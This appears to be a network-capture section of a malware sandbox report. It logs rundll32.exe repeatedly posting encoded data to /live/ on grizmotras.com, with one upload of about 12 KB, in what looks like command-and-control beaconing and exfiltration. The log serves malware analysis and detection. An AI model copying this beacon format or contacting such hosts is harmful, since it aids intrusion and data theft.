2024-04-26 21:18:54 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:54 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6a 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d Data Ascii: YjOeEyiMk3RjE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-26 21:18:58 UTC	572	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unACVl5UrROIb0zGjDEndaq4hSef7ZAJSlV06pfctVx044jOGhGhRuZ0J%2BYpYIHBobb2Tu8y98OVgv6tTKiix43ddWpA8nMDS5FwkaCnDV9NmirgzKNWhWMref3pCUz73A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99ba57fc2a669-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:58 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:18:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49771	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:58 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:58 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 69 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d Data Ascii: YjOeEyiMk3RiE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-26 21:19:02 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dQQkGIGDp1%2BxThjBycLoH5Usnm7O01CoOFJ0mwG2Zf5jVZx%2B%2Bg4P6rtXn1fr1zKWQqVG6Lt1573K9ByBJY7vcw%2F0Hzi3XVapfTtuIBOAIWs209vePgW83i7GzDeSoCsABQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99bc19d6da669-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:02 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49772	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:02 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:02 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:06 UTC	582	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6gEliE7bEwfOxnWCKmRewpFiTyRGJwuhy%2BW1Sn688JhqQHDDcr4uOxmkcp7mCOilznTRmVFQI0s%2F%2FoKi67%2Bq0fb5zcvqGcXoZw%2BVBWpPWxLRwJX7bWOpnRNyk%2FOaGvNTRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99bdceec32230-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:06 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49773	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:07 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 12444 Cache-Control: no-cache
2024-04-26 21:19:07 UTC	12444	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 4d 6e 52 41 75 53 4f 42 61 52 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6e 64 51 4a 4d 34 77 68 70 56 68 31 6a 47 36 39 76 68 78 73 4f 71 30 75 64 64 53 38 6f 38 73 2b 69 34 76 37 54 63 67 63 49 4b 30 5a 6d 7a 74 4a 6d 39 57 59 4f 48 50 61 49 76 54 73 50 74 48 35 43 59 61 6a 67 39 4e 63 4f 2b 53 37 33 Data Ascii: YjOeEyiMk3RqBMnRAuSOBaRcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHndQJM4whpVh1jG69vhxsOq0uddS8o8s+i4v7TcgcIK0ZmztJm9WYOHPaIvTsPtH5CYajg9NcO+S73
2024-04-26 21:19:14 UTC	584	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FCsBfmbNivpBKNvTgp%2BNwR6I6e7nRSB1Sjn%2FNO%2F8bYPBFsrmeLqM9KU9%2BfotnJcYrDU6wTd2%2FZwabUN3lk2Vsk8fuHZbky9leqi%2FDaXdjbN7YwlnsxDBBkkxs4tp7vdbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99bf64e4d31e3-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49774	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:15 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:15 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:19 UTC	582	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5g%2BHat4rwyDROOEeXi%2F90vRMuDMCVdZf0peN24%2FkR1hO3Czqfqm5RPd4k1EtYgHPVFummsdMz7%2FRV6%2B9wjfXNYLGDrXrosKZZuvrLNUmT3IV7PMTzTLnKA5Rz%2F96qNmmZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99c286e32db11-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:19 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49775	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:20 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:23 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZZ1Te%2FbYsswqmtyELFRFWjxkhB39xFFPWOynZhK%2F%2BXYj0qW8P7X%2FgLbwjVNdi4BC3kmKNTvysD3mRbvpv0zNEQMoBADL8ZDDCRXt1fZIm2nc1JG1GUZGbKkxfV7RUopGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99c4848648bff-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:23 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49776	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:24 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:24 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqAcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:28 UTC	574	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yA8C47DY7Rs77wSmGIVgKKv3xkM7LmG7c3GUgUM%2BaWm19wt7l0AThqeHk8wqM8AL6s%2B8l92qf6V84iImXdICyXqhuxNGWLFNMTLcsweijhll4jYXAgQ60zar18e1moTn6g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99c625b17875b-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:28 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49777	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:28 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:28 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqAMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:41 UTC	580	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y48UVrxK0DffGG3orA1IuLy7nWFOj9CFFcRaIe8u4ji0%2B0%2BVkuISbkyUuZNo0n43UnBcmzq8Ry69mydYBYExZxW%2FGdjvF%2BATI%2B3tH8KrTzodjYWFBE4wLkvmUOx9XSB1Nw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99c7cab022293-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:41 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49778	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:42 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:42 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqA8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:45 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJWkDkiAJZLm1unOjFmZTKO1xnjovGXtziQ%2BGOGBT7LEu06WVlbjabC%2FqJkANXwgkZLnnKOkMKFFYvE0X5f8btr7HCrDM7IYZG3dXHo57lplNZLHZRp9yGAeJzN24jP%2FAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99cd35a61b3bb-MIA alt-svc: h3=":443"; ma=86400
